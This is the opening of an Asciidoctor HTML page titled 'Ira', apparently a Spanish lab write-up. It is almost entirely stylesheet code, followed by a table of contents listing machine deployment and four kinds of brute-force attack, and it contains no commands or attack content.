<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="generator" content="Asciidoctor 2.0.23">
<meta name="author" content="Manuel L. Quero">
<title>Ira</title>
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Open+Sans:300,300italic,400,400italic,600,600italic%7CNoto+Serif:400,400italic,700,700italic%7CDroid+Sans+Mono:400,700">
<style>
/*! Asciidoctor default stylesheet | MIT License | https://asciidoctor.org */
/* Uncomment the following line when using as a custom stylesheet */
/* @import "https://fonts.googleapis.com/css?family=Open+Sans:300,300italic,400,400italic,600,600italic%7CNoto+Serif:400,400italic,700,700italic%7CDroid+Sans+Mono:400,700"; */
html{font-family:sans-serif;-webkit-text-size-adjust:100%}
a{background:none}
a:focus{outline:thin dotted}
a:active,a:hover{outline:0}
h1{font-size:2em;margin:.67em 0}
b,strong{font-weight:bold}
abbr{font-size:.9em}
abbr[title]{cursor:help;border-bottom:1px dotted #dddddf;text-decoration:none}
dfn{font-style:italic}
hr{height:0}
mark{background:#ff0;color:#000}
code,kbd,pre,samp{font-family:monospace;font-size:1em}
pre{white-space:pre-wrap}
q{quotes:"\201C" "\201D" "\2018" "\2019"}
small{font-size:80%}
sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}
sup{top:-.5em}
sub{bottom:-.25em}
img{border:0}
svg:not(:root){overflow:hidden}
figure{margin:0}
audio,video{display:inline-block}
audio:not([controls]){display:none;height:0}
fieldset{border:1px solid silver;margin:0 2px;padding:.35em .625em .75em}
legend{border:0;padding:0}
button,input,select,textarea{font-family:inherit;font-size:100%;margin:0}
button,input{line-height:normal}
button,select{text-transform:none}
button,html input[type=button],input[type=reset],input[type=submit]{-webkit-appearance:button;cursor:pointer}
button[disabled],html input[disabled]{cursor:default}
input[type=checkbox],input[type=radio]{padding:0}
button::-moz-focus-inner,input::-moz-focus-inner{border:0;padding:0}
textarea{overflow:auto;vertical-align:top}
table{border-collapse:collapse;border-spacing:0}
*,::before,::after{box-sizing:border-box}
html,body{font-size:100%}
body{background:#fff;color:rgba(0,0,0,.8);padding:0;margin:0;font-family:"Noto Serif","DejaVu Serif",serif;line-height:1;position:relative;cursor:auto;-moz-tab-size:4;-o-tab-size:4;tab-size:4;word-wrap:anywhere;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased}
a:hover{cursor:pointer}
img,object,embed{max-width:100%;height:auto}
object,embed{height:100%}
img{-ms-interpolation-mode:bicubic}
.left{float:left!important}
.right{float:right!important}
.text-left{text-align:left!important}
.text-right{text-align:right!important}
.text-center{text-align:center!important}
.text-justify{text-align:justify!important}
.hide{display:none}
img,object,svg{display:inline-block;vertical-align:middle}
textarea{height:auto;min-height:50px}
select{width:100%}
.subheader,.admonitionblock td.content>.title,.audioblock>.title,.exampleblock>.title,.imageblock>.title,.listingblock>.title,.literalblock>.title,.stemblock>.title,.openblock>.title,.paragraph>.title,.quoteblock>.title,table.tableblock>.title,.verseblock>.title,.videoblock>.title,.dlist>.title,.olist>.title,.ulist>.title,.qlist>.title,.hdlist>.title{line-height:1.45;color:#7a2518;font-weight:400;margin-top:0;margin-bottom:.25em}
div,dl,dt,dd,ul,ol,li,h1,h2,h3,#toctitle,.sidebarblock>.content>.title,h4,h5,h6,pre,form,p,blockquote,th,td{margin:0;padding:0}
a{color:#2156a5;text-decoration:underline;line-height:inherit}
a:hover,a:focus{color:#1d4b8f}
a img{border:0}
p{line-height:1.6;margin-bottom:1.25em;text-rendering:optimizeLegibility}
p aside{font-size:.875em;line-height:1.35;font-style:italic}
h1,h2,h3,#toctitle,.sidebarblock>.content>.title,h4,h5,h6{font-family:"Open Sans","DejaVu Sans",sans-serif;font-weight:300;font-style:normal;color:#ba3925;text-rendering:optimizeLegibility;margin-top:1em;margin-bottom:.5em;line-height:1.0125em}
h1 small,h2 small,h3 small,#toctitle small,.sidebarblock>.content>.title small,h4 small,h5 small,h6 small{font-size:60%;color:#e99b8f;line-height:0}
h1{font-size:2.125em}
h2{font-size:1.6875em}
h3,#toctitle,.sidebarblock>.content>.title{font-size:1.375em}
h4,h5{font-size:1.125em}
h6{font-size:1em}
hr{border:solid #dddddf;border-width:1px 0 0;clear:both;margin:1.25em 0 1.1875em}
em,i{font-style:italic;line-height:inherit}
strong,b{font-weight:bold;line-height:inherit}
small{font-size:60%;line-height:inherit}
code{font-family:"Droid Sans Mono","DejaVu Sans Mono",monospace;font-weight:400;color:rgba(0,0,0,.9)}
ul,ol,dl{line-height:1.6;margin-bottom:1.25em;list-style-position:outside;font-family:inherit}
ul,ol{margin-left:1.5em}
ul li ul,ul li ol{margin-left:1.25em;margin-bottom:0}
ul.circle{list-style-type:circle}
ul.disc{list-style-type:disc}
ul.square{list-style-type:square}
ul.circle ul:not([class]),ul.disc ul:not([class]),ul.square ul:not([class]){list-style:inherit}
ol li ul,ol li ol{margin-left:1.25em;margin-bottom:0}
dl dt{margin-bottom:.3125em;font-weight:bold}
dl dd{margin-bottom:1.25em}
blockquote{margin:0 0 1.25em;padding:.5625em 1.25em 0 1.1875em;border-left:1px solid #ddd}
blockquote,blockquote p{line-height:1.6;color:rgba(0,0,0,.85)}
@media screen and (min-width:768px){h1,h2,h3,#toctitle,.sidebarblock>.content>.title,h4,h5,h6{line-height:1.2}
h1{font-size:2.75em}
h2{font-size:2.3125em}
h3,#toctitle,.sidebarblock>.content>.title{font-size:1.6875em}
h4{font-size:1.4375em}}
table{background:#fff;margin-bottom:1.25em;border:1px solid #dedede;word-wrap:normal}
table thead,table tfoot{background:#f7f8f7}
table thead tr th,table thead tr td,table tfoot tr th,table tfoot tr td{padding:.5em .625em .625em;font-size:inherit;color:rgba(0,0,0,.8);text-align:left}
table tr th,table tr td{padding:.5625em .625em;font-size:inherit;color:rgba(0,0,0,.8)}
table tr.even,table tr.alt{background:#f8f8f7}
table thead tr th,table tfoot tr th,table tbody tr td,table tr td,table tfoot tr td{line-height:1.6}
h1,h2,h3,#toctitle,.sidebarblock>.content>.title,h4,h5,h6{line-height:1.2;word-spacing:-.05em}
h1 strong,h2 strong,h3 strong,#toctitle strong,.sidebarblock>.content>.title strong,h4 strong,h5 strong,h6 strong{font-weight:400}
.center{margin-left:auto;margin-right:auto}
.stretch{width:100%}
.clearfix::before,.clearfix::after,.float-group::before,.float-group::after{content:" ";display:table}
.clearfix::after,.float-group::after{clear:both}
:not(pre).nobreak{word-wrap:normal}
:not(pre).nowrap{white-space:nowrap}
:not(pre).pre-wrap{white-space:pre-wrap}
:not(pre):not([class^=L])>code{font-size:.9375em;font-style:normal!important;letter-spacing:0;padding:.1em .5ex;word-spacing:-.15em;background:#f7f7f8;border-radius:4px;line-height:1.45;text-rendering:optimizeSpeed}
pre{color:rgba(0,0,0,.9);font-family:"Droid Sans Mono","DejaVu Sans Mono",monospace;line-height:1.45;text-rendering:optimizeSpeed}
pre code,pre pre{color:inherit;font-size:inherit;line-height:inherit}
pre>code{display:block}
pre.nowrap,pre.nowrap pre{white-space:pre;word-wrap:normal}
em em{font-style:normal}
strong strong{font-weight:400}
.keyseq{color:rgba(51,51,51,.8)}
kbd{font-family:"Droid Sans Mono","DejaVu Sans Mono",monospace;display:inline-block;color:rgba(0,0,0,.8);font-size:.65em;line-height:1.45;background:#f7f7f7;border:1px solid #ccc;border-radius:3px;box-shadow:0 1px 0 rgba(0,0,0,.2),inset 0 0 0 .1em #fff;margin:0 .15em;padding:.2em .5em;vertical-align:middle;position:relative;top:-.1em;white-space:nowrap}
.keyseq kbd:first-child{margin-left:0}
.keyseq kbd:last-child{margin-right:0}
.menuseq,.menuref{color:#000}
.menuseq b:not(.caret),.menuref{font-weight:inherit}
.menuseq{word-spacing:-.02em}
.menuseq b.caret{font-size:1.25em;line-height:.8}
.menuseq i.caret{font-weight:bold;text-align:center;width:.45em}
b.button::before,b.button::after{position:relative;top:-1px;font-weight:400}
b.button::before{content:"[";padding:0 3px 0 2px}
b.button::after{content:"]";padding:0 2px 0 3px}
p a>code:hover{color:rgba(0,0,0,.9)}
#header,#content,#footnotes,#footer{width:100%;margin:0 auto;max-width:62.5em;*zoom:1;position:relative;padding-left:.9375em;padding-right:.9375em}
#header::before,#header::after,#content::before,#content::after,#footnotes::before,#footnotes::after,#footer::before,#footer::after{content:" ";display:table}
#header::after,#content::after,#footnotes::after,#footer::after{clear:both}
#content{margin-top:1.25em}
#content::before{content:none}
#header>h1:first-child{color:rgba(0,0,0,.85);margin-top:2.25rem;margin-bottom:0}
#header>h1:first-child+#toc{margin-top:8px;border-top:1px solid #dddddf}
#header>h1:only-child{border-bottom:1px solid #dddddf;padding-bottom:8px}
#header .details{border-bottom:1px solid #dddddf;line-height:1.45;padding-top:.25em;padding-bottom:.25em;padding-left:.25em;color:rgba(0,0,0,.6);display:flex;flex-flow:row wrap}
#header .details span:first-child{margin-left:-.125em}
#header .details span.email a{color:rgba(0,0,0,.85)}
#header .details br{display:none}
#header .details br+span::before{content:"\00a0\2013\00a0"}
#header .details br+span.author::before{content:"\00a0\22c5\00a0";color:rgba(0,0,0,.85)}
#header .details br+span#revremark::before{content:"\00a0|\00a0"}
#header #revnumber{text-transform:capitalize}
#header #revnumber::after{content:"\00a0"}
#content>h1:first-child:not([class]){color:rgba(0,0,0,.85);border-bottom:1px solid #dddddf;padding-bottom:8px;margin-top:0;padding-top:1rem;margin-bottom:1.25rem}
#toc{border-bottom:1px solid #e7e7e9;padding-bottom:.5em}
#toc>ul{margin-left:.125em}
#toc ul.sectlevel0>li>a{font-style:italic}
#toc ul.sectlevel0 ul.sectlevel1{margin:.5em 0}
#toc ul{font-family:"Open Sans","DejaVu Sans",sans-serif;list-style-type:none}
#toc li{line-height:1.3334;margin-top:.3334em}
#toc a{text-decoration:none}
#toc a:active{text-decoration:underline}
#toctitle{color:#7a2518;font-size:1.2em}
@media screen and (min-width:768px){#toctitle{font-size:1.375em}
body.toc2{padding-left:15em;padding-right:0}
body.toc2 #header>h1:nth-last-child(2){border-bottom:1px solid #dddddf;padding-bottom:8px}
#toc.toc2{margin-top:0!important;background:#f8f8f7;position:fixed;width:15em;left:0;top:0;border-right:1px solid #e7e7e9;border-top-width:0!important;border-bottom-width:0!important;z-index:1000;padding:1.25em 1em;height:100%;overflow:auto}
#toc.toc2 #toctitle{margin-top:0;margin-bottom:.8rem;font-size:1.2em}
#toc.toc2>ul{font-size:.9em;margin-bottom:0}
#toc.toc2 ul ul{margin-left:0;padding-left:1em}
#toc.toc2 ul.sectlevel0 ul.sectlevel1{padding-left:0;margin-top:.5em;margin-bottom:.5em}
body.toc2.toc-right{padding-left:0;padding-right:15em}
body.toc2.toc-right #toc.toc2{border-right-width:0;border-left:1px solid #e7e7e9;left:auto;right:0}}
@media screen and (min-width:1280px){body.toc2{padding-left:20em;padding-right:0}
#toc.toc2{width:20em}
#toc.toc2 #toctitle{font-size:1.375em}
#toc.toc2>ul{font-size:.95em}
#toc.toc2 ul ul{padding-left:1.25em}
body.toc2.toc-right{padding-left:0;padding-right:20em}}
#content #toc{border:1px solid #e0e0dc;margin-bottom:1.25em;padding:1.25em;background:#f8f8f7;border-radius:4px}
#content #toc>:first-child{margin-top:0}
#content #toc>:last-child{margin-bottom:0}
#footer{max-width:none;background:rgba(0,0,0,.8);padding:1.25em}
#footer-text{color:hsla(0,0%,100%,.8);line-height:1.44}
#content{margin-bottom:.625em}
.sect1{padding-bottom:.625em}
@media screen and (min-width:768px){#content{margin-bottom:1.25em}
.sect1{padding-bottom:1.25em}}
.sect1:last-child{padding-bottom:0}
.sect1+.sect1{border-top:1px solid #e7e7e9}
#content h1>a.anchor,h2>a.anchor,h3>a.anchor,#toctitle>a.anchor,.sidebarblock>.content>.title>a.anchor,h4>a.anchor,h5>a.anchor,h6>a.anchor{position:absolute;z-index:1001;width:1.5ex;margin-left:-1.5ex;display:block;text-decoration:none!important;visibility:hidden;text-align:center;font-weight:400}
#content h1>a.anchor::before,h2>a.anchor::before,h3>a.anchor::before,#toctitle>a.anchor::before,.sidebarblock>.content>.title>a.anchor::before,h4>a.anchor::before,h5>a.anchor::before,h6>a.anchor::before{content:"\00A7";font-size:.85em;display:block;padding-top:.1em}
#content h1:hover>a.anchor,#content h1>a.anchor:hover,h2:hover>a.anchor,h2>a.anchor:hover,h3:hover>a.anchor,#toctitle:hover>a.anchor,.sidebarblock>.content>.title:hover>a.anchor,h3>a.anchor:hover,#toctitle>a.anchor:hover,.sidebarblock>.content>.title>a.anchor:hover,h4:hover>a.anchor,h4>a.anchor:hover,h5:hover>a.anchor,h5>a.anchor:hover,h6:hover>a.anchor,h6>a.anchor:hover{visibility:visible}
#content h1>a.link,h2>a.link,h3>a.link,#toctitle>a.link,.sidebarblock>.content>.title>a.link,h4>a.link,h5>a.link,h6>a.link{color:#ba3925;text-decoration:none}
#content h1>a.link:hover,h2>a.link:hover,h3>a.link:hover,#toctitle>a.link:hover,.sidebarblock>.content>.title>a.link:hover,h4>a.link:hover,h5>a.link:hover,h6>a.link:hover{color:#a53221}
details,.audioblock,.imageblock,.literalblock,.listingblock,.stemblock,.videoblock{margin-bottom:1.25em}
details{margin-left:1.25rem}
details>summary{cursor:pointer;display:block;position:relative;line-height:1.6;margin-bottom:.625rem;outline:none;-webkit-tap-highlight-color:transparent}
details>summary::-webkit-details-marker{display:none}
details>summary::before{content:"";border:solid transparent;border-left:solid;border-width:.3em 0 .3em .5em;position:absolute;top:.5em;left:-1.25rem;transform:translateX(15%)}
details[open]>summary::before{border:solid transparent;border-top:solid;border-width:.5em .3em 0;transform:translateY(15%)}
details>summary::after{content:"";width:1.25rem;height:1em;position:absolute;top:.3em;left:-1.25rem}
.admonitionblock td.content>.title,.audioblock>.title,.exampleblock>.title,.imageblock>.title,.listingblock>.title,.literalblock>.title,.stemblock>.title,.openblock>.title,.paragraph>.title,.quoteblock>.title,table.tableblock>.title,.verseblock>.title,.videoblock>.title,.dlist>.title,.olist>.title,.ulist>.title,.qlist>.title,.hdlist>.title{text-rendering:optimizeLegibility;text-align:left;font-family:"Noto Serif","DejaVu Serif",serif;font-size:1rem;font-style:italic}
table.tableblock.fit-content>caption.title{white-space:nowrap;width:0}
.paragraph.lead>p,#preamble>.sectionbody>[class=paragraph]:first-of-type p{font-size:1.21875em;line-height:1.6;color:rgba(0,0,0,.85)}
.admonitionblock>table{border-collapse:separate;border:0;background:none;width:100%}
.admonitionblock>table td.icon{text-align:center;width:80px}
.admonitionblock>table td.icon img{max-width:none}
.admonitionblock>table td.icon .title{font-weight:bold;font-family:"Open Sans","DejaVu Sans",sans-serif;text-transform:uppercase}
.admonitionblock>table td.content{padding-left:1.125em;padding-right:1.25em;border-left:1px solid #dddddf;color:rgba(0,0,0,.6);word-wrap:anywhere}
.admonitionblock>table td.content>:last-child>:last-child{margin-bottom:0}
.exampleblock>.content{border:1px solid #e6e6e6;margin-bottom:1.25em;padding:1.25em;background:#fff;border-radius:4px}
.sidebarblock{border:1px solid #dbdbd6;margin-bottom:1.25em;padding:1.25em;background:#f3f3f2;border-radius:4px}
.sidebarblock>.content>.title{color:#7a2518;margin-top:0;text-align:center}
.exampleblock>.content>:first-child,.sidebarblock>.content>:first-child{margin-top:0}
.exampleblock>.content>:last-child,.exampleblock>.content>:last-child>:last-child,.exampleblock>.content .olist>ol>li:last-child>:last-child,.exampleblock>.content .ulist>ul>li:last-child>:last-child,.exampleblock>.content .qlist>ol>li:last-child>:last-child,.sidebarblock>.content>:last-child,.sidebarblock>.content>:last-child>:last-child,.sidebarblock>.content .olist>ol>li:last-child>:last-child,.sidebarblock>.content .ulist>ul>li:last-child>:last-child,.sidebarblock>.content .qlist>ol>li:last-child>:last-child{margin-bottom:0}
.literalblock pre,.listingblock>.content>pre{border-radius:4px;overflow-x:auto;padding:1em;font-size:.8125em}
@media screen and (min-width:768px){.literalblock pre,.listingblock>.content>pre{font-size:.90625em}}
@media screen and (min-width:1280px){.literalblock pre,.listingblock>.content>pre{font-size:1em}}
.literalblock pre,.listingblock>.content>pre:not(.highlight),.listingblock>.content>pre[class=highlight],.listingblock>.content>pre[class^="highlight "]{background:#f7f7f8}
.literalblock.output pre{color:#f7f7f8;background:rgba(0,0,0,.9)}
.listingblock>.content{position:relative}
.listingblock code[data-lang]::before{display:none;content:attr(data-lang);position:absolute;font-size:.75em;top:.425rem;right:.5rem;line-height:1;text-transform:uppercase;color:inherit;opacity:.5}
.listingblock:hover code[data-lang]::before{display:block}
.listingblock.terminal pre .command::before{content:attr(data-prompt);padding-right:.5em;color:inherit;opacity:.5}
.listingblock.terminal pre .command:not([data-prompt])::before{content:"$"}
.listingblock pre.highlightjs{padding:0}
.listingblock pre.highlightjs>code{padding:1em;border-radius:4px}
.listingblock pre.prettyprint{border-width:0}
.prettyprint{background:#f7f7f8}
pre.prettyprint .linenums{line-height:1.45;margin-left:2em}
pre.prettyprint li{background:none;list-style-type:inherit;padding-left:0}
pre.prettyprint li code[data-lang]::before{opacity:1}
pre.prettyprint li:not(:first-child) code[data-lang]::before{display:none}
table.linenotable{border-collapse:separate;border:0;margin-bottom:0;background:none}
table.linenotable td[class]{color:inherit;vertical-align:top;padding:0;line-height:inherit;white-space:normal}
table.linenotable td.code{padding-left:.75em}
table.linenotable td.linenos,pre.pygments .linenos{border-right:1px solid;opacity:.35;padding-right:.5em;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}
pre.pygments span.linenos{display:inline-block;margin-right:.75em}
.quoteblock{margin:0 1em 1.25em 1.5em;display:table}
.quoteblock:not(.excerpt)>.title{margin-left:-1.5em;margin-bottom:.75em}
.quoteblock blockquote,.quoteblock p{color:rgba(0,0,0,.85);font-size:1.15rem;line-height:1.75;word-spacing:.1em;letter-spacing:0;font-style:italic;text-align:justify}
.quoteblock blockquote{margin:0;padding:0;border:0}
.quoteblock blockquote::before{content:"\201c";float:left;font-size:2.75em;font-weight:bold;line-height:.6em;margin-left:-.6em;color:#7a2518;text-shadow:0 1px 2px rgba(0,0,0,.1)}
.quoteblock blockquote>.paragraph:last-child p{margin-bottom:0}
.quoteblock .attribution{margin-top:.75em;margin-right:.5ex;text-align:right}
.verseblock{margin:0 1em 1.25em}
.verseblock pre{font-family:"Open Sans","DejaVu Sans",sans-serif;font-size:1.15rem;color:rgba(0,0,0,.85);font-weight:300;text-rendering:optimizeLegibility}
.verseblock pre strong{font-weight:400}
.verseblock .attribution{margin-top:1.25rem;margin-left:.5ex}
.quoteblock .attribution,.verseblock .attribution{font-size:.9375em;line-height:1.45;font-style:italic}
.quoteblock .attribution br,.verseblock .attribution br{display:none}
.quoteblock .attribution cite,.verseblock .attribution cite{display:block;letter-spacing:-.025em;color:rgba(0,0,0,.6)}
.quoteblock.abstract blockquote::before,.quoteblock.excerpt blockquote::before,.quoteblock .quoteblock blockquote::before{display:none}
.quoteblock.abstract blockquote,.quoteblock.abstract p,.quoteblock.excerpt blockquote,.quoteblock.excerpt p,.quoteblock .quoteblock blockquote,.quoteblock .quoteblock p{line-height:1.6;word-spacing:0}
.quoteblock.abstract{margin:0 1em 1.25em;display:block}
.quoteblock.abstract>.title{margin:0 0 .375em;font-size:1.15em;text-align:center}
.quoteblock.excerpt>blockquote,.quoteblock .quoteblock{padding:0 0 .25em 1em;border-left:.25em solid #dddddf}
.quoteblock.excerpt,.quoteblock .quoteblock{margin-left:0}
.quoteblock.excerpt blockquote,.quoteblock.excerpt p,.quoteblock .quoteblock blockquote,.quoteblock .quoteblock p{color:inherit;font-size:1.0625rem}
.quoteblock.excerpt .attribution,.quoteblock .quoteblock .attribution{color:inherit;font-size:.85rem;text-align:left;margin-right:0}
p.tableblock:last-child{margin-bottom:0}
td.tableblock>.content{margin-bottom:1.25em;word-wrap:anywhere}
td.tableblock>.content>:last-child{margin-bottom:-1.25em}
table.tableblock,th.tableblock,td.tableblock{border:0 solid #dedede}
table.grid-all>*>tr>*{border-width:1px}
table.grid-cols>*>tr>*{border-width:0 1px}
table.grid-rows>*>tr>*{border-width:1px 0}
table.frame-all{border-width:1px}
table.frame-ends{border-width:1px 0}
table.frame-sides{border-width:0 1px}
table.frame-none>colgroup+*>:first-child>*,table.frame-sides>colgroup+*>:first-child>*{border-top-width:0}
table.frame-none>:last-child>:last-child>*,table.frame-sides>:last-child>:last-child>*{border-bottom-width:0}
table.frame-none>*>tr>:first-child,table.frame-ends>*>tr>:first-child{border-left-width:0}
table.frame-none>*>tr>:last-child,table.frame-ends>*>tr>:last-child{border-right-width:0}
table.stripes-all>*>tr,table.stripes-odd>*>tr:nth-of-type(odd),table.stripes-even>*>tr:nth-of-type(even),table.stripes-hover>*>tr:hover{background:#f8f8f7}
th.halign-left,td.halign-left{text-align:left}
th.halign-right,td.halign-right{text-align:right}
th.halign-center,td.halign-center{text-align:center}
th.valign-top,td.valign-top{vertical-align:top}
th.valign-bottom,td.valign-bottom{vertical-align:bottom}
th.valign-middle,td.valign-middle{vertical-align:middle}
table thead th,table tfoot th{font-weight:bold}
tbody tr th{background:#f7f8f7}
tbody tr th,tbody tr th p,tfoot tr th,tfoot tr th p{color:rgba(0,0,0,.8);font-weight:bold}
p.tableblock>code:only-child{background:none;padding:0}
p.tableblock{font-size:1em}
ol{margin-left:1.75em}
ul li ol{margin-left:1.5em}
dl dd{margin-left:1.125em}
dl dd:last-child,dl dd:last-child>:last-child{margin-bottom:0}
li p,ul dd,ol dd,.olist .olist,.ulist .ulist,.ulist .olist,.olist .ulist{margin-bottom:.625em}
ul.checklist,ul.none,ol.none,ul.no-bullet,ol.no-bullet,ol.unnumbered,ul.unstyled,ol.unstyled{list-style-type:none}
ul.no-bullet,ol.no-bullet,ol.unnumbered{margin-left:.625em}
ul.unstyled,ol.unstyled{margin-left:0}
li>p:empty:only-child::before{content:"";display:inline-block}
ul.checklist>li>p:first-child{margin-left:-1em}
ul.checklist>li>p:first-child>.fa-square-o:first-child,ul.checklist>li>p:first-child>.fa-check-square-o:first-child{width:1.25em;font-size:.8em;position:relative;bottom:.125em}
ul.checklist>li>p:first-child>input[type=checkbox]:first-child{margin-right:.25em}
ul.inline{display:flex;flex-flow:row wrap;list-style:none;margin:0 0 .625em -1.25em}
ul.inline>li{margin-left:1.25em}
.unstyled dl dt{font-weight:400;font-style:normal}
ol.arabic{list-style-type:decimal}
ol.decimal{list-style-type:decimal-leading-zero}
ol.loweralpha{list-style-type:lower-alpha}
ol.upperalpha{list-style-type:upper-alpha}
ol.lowerroman{list-style-type:lower-roman}
ol.upperroman{list-style-type:upper-roman}
ol.lowergreek{list-style-type:lower-greek}
.hdlist>table,.colist>table{border:0;background:none}
.hdlist>table>tbody>tr,.colist>table>tbody>tr{background:none}
td.hdlist1,td.hdlist2{vertical-align:top;padding:0 .625em}
td.hdlist1{font-weight:bold;padding-bottom:1.25em}
td.hdlist2{word-wrap:anywhere}
.literalblock+.colist,.listingblock+.colist{margin-top:-.5em}
.colist td:not([class]):first-child{padding:.4em .75em 0;line-height:1;vertical-align:top}
.colist td:not([class]):first-child img{max-width:none}
.colist td:not([class]):last-child{padding:.25em 0}
.thumb,.th{line-height:0;display:inline-block;border:4px solid #fff;box-shadow:0 0 0 1px #ddd}
.imageblock.left{margin:.25em .625em 1.25em 0}
.imageblock.right{margin:.25em 0 1.25em .625em}
.imageblock>.title{margin-bottom:0}
.imageblock.thumb,.imageblock.th{border-width:6px}
.imageblock.thumb>.title,.imageblock.th>.title{padding:0 .125em}
.image.left,.image.right{margin-top:.25em;margin-bottom:.25em;display:inline-block;line-height:0}
.image.left{margin-right:.625em}
.image.right{margin-left:.625em}
a.image{text-decoration:none;display:inline-block}
a.image object{pointer-events:none}
sup.footnote,sup.footnoteref{font-size:.875em;position:static;vertical-align:super}
sup.footnote a,sup.footnoteref a{text-decoration:none}
sup.footnote a:active,sup.footnoteref a:active,#footnotes .footnote a:first-of-type:active{text-decoration:underline}
#footnotes{padding-top:.75em;padding-bottom:.75em;margin-bottom:.625em}
#footnotes hr{width:20%;min-width:6.25em;margin:-.25em 0 .75em;border-width:1px 0 0}
#footnotes .footnote{padding:0 .375em 0 .225em;line-height:1.3334;font-size:.875em;margin-left:1.2em;margin-bottom:.2em}
#footnotes .footnote a:first-of-type{font-weight:bold;text-decoration:none;margin-left:-1.05em}
#footnotes .footnote:last-of-type{margin-bottom:0}
#content #footnotes{margin-top:-.625em;margin-bottom:0;padding:.75em 0}
div.unbreakable{page-break-inside:avoid}
.big{font-size:larger}
.small{font-size:smaller}
.underline{text-decoration:underline}
.overline{text-decoration:overline}
.line-through{text-decoration:line-through}
.aqua{color:#00bfbf}
.aqua-background{background:#00fafa}
.black{color:#000}
.black-background{background:#000}
.blue{color:#0000bf}
.blue-background{background:#0000fa}
.fuchsia{color:#bf00bf}
.fuchsia-background{background:#fa00fa}
.gray{color:#606060}
.gray-background{background:#7d7d7d}
.green{color:#006000}
.green-background{background:#007d00}
.lime{color:#00bf00}
.lime-background{background:#00fa00}
.maroon{color:#600000}
.maroon-background{background:#7d0000}
.navy{color:#000060}
.navy-background{background:#00007d}
.olive{color:#606000}
.olive-background{background:#7d7d00}
.purple{color:#600060}
.purple-background{background:#7d007d}
.red{color:#bf0000}
.red-background{background:#fa0000}
.silver{color:#909090}
.silver-background{background:#bcbcbc}
.teal{color:#006060}
.teal-background{background:#007d7d}
.white{color:#bfbfbf}
.white-background{background:#fafafa}
.yellow{color:#bfbf00}
.yellow-background{background:#fafa00}
span.icon>.fa{cursor:default}
a span.icon>.fa{cursor:inherit}
.admonitionblock td.icon [class^="fa icon-"]{font-size:2.5em;text-shadow:1px 1px 2px rgba(0,0,0,.5);cursor:default}
.admonitionblock td.icon .icon-note::before{content:"\f05a";color:#19407c}
.admonitionblock td.icon .icon-tip::before{content:"\f0eb";text-shadow:1px 1px 2px rgba(155,155,0,.8);color:#111}
.admonitionblock td.icon .icon-warning::before{content:"\f071";color:#bf6900}
.admonitionblock td.icon .icon-caution::before{content:"\f06d";color:#bf3400}
.admonitionblock td.icon .icon-important::before{content:"\f06a";color:#bf0000}
.conum[data-value]{display:inline-block;color:#fff!important;background:rgba(0,0,0,.8);border-radius:50%;text-align:center;font-size:.75em;width:1.67em;height:1.67em;line-height:1.67em;font-family:"Open Sans","DejaVu Sans",sans-serif;font-style:normal;font-weight:bold}
.conum[data-value] *{color:#fff!important}
.conum[data-value]+b{display:none}
.conum[data-value]::after{content:attr(data-value)}
pre .conum[data-value]{position:relative;top:-.125em}
b.conum *{color:inherit!important}
.conum:not([data-value]):empty{display:none}
dt,th.tableblock,td.content,div.footnote{text-rendering:optimizeLegibility}
h1,h2,p,td.content,span.alt,summary{letter-spacing:-.01em}
p strong,td.content strong,div.footnote strong{letter-spacing:-.005em}
p,blockquote,dt,td.content,td.hdlist1,span.alt,summary{font-size:1.0625rem}
p{margin-bottom:1.25rem}
.sidebarblock p,.sidebarblock dt,.sidebarblock td.content,p.tableblock{font-size:1em}
.exampleblock>.content{background:#fffef7;border-color:#e0e0dc;box-shadow:0 1px 4px #e0e0dc}
.print-only{display:none!important}
@page{margin:1.25cm .75cm}
@media print{*{box-shadow:none!important;text-shadow:none!important}
html{font-size:80%}
a{color:inherit!important;text-decoration:underline!important}
a.bare,a[href^="#"],a[href^="mailto:"]{text-decoration:none!important}
a[href^="http:"]:not(.bare)::after,a[href^="https:"]:not(.bare)::after{content:"(" attr(href) ")";display:inline-block;font-size:.875em;padding-left:.25em}
abbr[title]{border-bottom:1px dotted}
abbr[title]::after{content:" (" attr(title) ")"}
pre,blockquote,tr,img,object,svg{page-break-inside:avoid}
thead{display:table-header-group}
svg{max-width:100%}
p,blockquote,dt,td.content{font-size:1em;orphans:3;widows:3}
h2,h3,#toctitle,.sidebarblock>.content>.title{page-break-after:avoid}
#header,#content,#footnotes,#footer{max-width:none}
#toc,.sidebarblock,.exampleblock>.content{background:none!important}
#toc{border-bottom:1px solid #dddddf!important;padding-bottom:0!important}
body.book #header{text-align:center}
body.book #header>h1:first-child{border:0!important;margin:2.5em 0 1em}
body.book #header .details{border:0!important;display:block;padding:0!important}
body.book #header .details span:first-child{margin-left:0!important}
body.book #header .details br{display:block}
body.book #header .details br+span::before{content:none!important}
body.book #toc{border:0!important;text-align:left!important;padding:0!important;margin:0!important}
body.book #toc,body.book #preamble,body.book h1.sect0,body.book .sect1>h2{page-break-before:always}
.listingblock code[data-lang]::before{display:block}
#footer{padding:0 .9375em}
.hide-on-print{display:none!important}
.print-only{display:block!important}
.hide-for-print{display:none!important}
.show-for-print{display:inherit!important}}
@media amzn-kf8,print{#header>h1:first-child{margin-top:1.25rem}
.sect1{padding:0!important}
.sect1+.sect1{border:0}
#footer{background:none}
#footer-text{color:rgba(0,0,0,.6);font-size:.9em}}
@media amzn-kf8{#header,#content,#footnotes,#footer{padding:0}}
</style>
</head>
<body class="book toc2 toc-left">
<div id="header">
<h1>Ira</h1>
<div class="details">
<span id="author" class="author">Manuel L. Quero</span><br>
</div>
<div id="toc" class="toc2">
<div id="toctitle">Table of Contents</div>
<ul class="sectlevel1">
<li><a href="#_despliegue_de_la_máquina">Despliegue de la máquina</a></li>
<li><a href="#_ataque_de_fuerza_bruta">Ataque de Fuerza Bruta</a>
<ul class="sectlevel2">
<li><a href="#_1_ataque_de_fuerza_bruta_estándar">1. Ataque de fuerza bruta estándar</a></li>
<li><a href="#_2_ataque_de_fuerza_bruta_con_diccionario">2. Ataque de fuerza bruta con diccionario</a></li>
<li><a href="#_3_ataques_de_fuerza_bruta_híbrida">3. Ataques de fuerza bruta híbrida</a></li>
<li><a href="#_4_ataques_de_fuerza_bruta_inversa">4. Ataques de fuerza bruta inversa</a></li>
</ul>
